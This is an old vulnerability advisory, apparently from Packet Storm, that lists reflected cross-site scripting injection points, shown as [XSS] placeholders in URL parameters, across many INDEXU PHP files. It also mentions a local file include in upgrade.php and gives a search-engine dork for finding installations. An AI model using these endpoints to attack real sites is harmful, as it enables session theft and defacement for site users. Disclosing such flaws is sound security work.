indexu-xss.txt

🗓️ 20 Jan 2007 00:00:00Reported by SwEET-DeViLType

packetstorm🔗 packetstormsecurity.com👁 12729 Views

vulnerability in INDEXU all versions allowing XSS attacks in multiple files like upgrade.php, suggest_category.php, user_detail.php, tell_friend.php, sendmail.php, and more. Found by SwEET-DeViL, viP HaCkEr & HaCkEr sUn from TeaM AL-GaRNi

`vulnerability script indexu all versions  
Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn  
TeaM AL-GaRNi  
Application : indexu  
version : all versions  
URL : http://www.nicecoder.com/  
google : "Powered by INDEXU 5."  
  
Exploits :  
|//1\\|  
in upgrade.php  
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #../index.php  
AND Local File Include~  
##########################  
|//2\\|  
in suggest_category.php  
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]  
##########################  
|//3\\|  
in user_detail.php  
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]  
##########################  
|//4\\|  
in tell_friend.php  
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]  
  
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]  
  
http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]  
  
http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]  
  
http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]  
  
http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]  
##########################  
|//5\\|  
in sendmail.php  
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]  
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]  
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]  
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]  
##########################  
//6\\  
in send_pwd.php  
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]  
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]  
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]  
##########################  
|//7\\|  
in search.php  
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]  
##########################  
|//8\\|  
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]  
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]  
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]  
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]  
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]  
##########################  
|//9\\|  
power_search.php  
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]  
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]  
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]  
##########################  
|//10\\|  
in new.php  
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]  
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]  
##########################  
|//11\\|  
in modify.php  
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]  
##########################  
|//12\\|  
in mailing_list.php  
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]  
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]  
##########################  
|//13\\|  
in login.php  
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]  
##########################  
|//...$...\\|  
There is another vulnerability in the program, a XSS  
:::::::::::::::::::::::::::::::::  
:: ########### ########### ::  
:: ########### ########### ::  
:: ### ### ### ::  
:: ### ########### ::  
:: ### ###### ########### ::  
:: ### ## ### == ### ### ::  
:: ### ### == ### ### ::  
:: ############ ### ### ::  
:: ############ ### ### ::  
:::::::::::::::::::::::::::::::::  
##########################  
#####[email protected]##  
#####[email protected]########  
########(c)2007###########  
`

20 Jan 2007 00:00Current

7.4High risk

Vulners AI Score7.4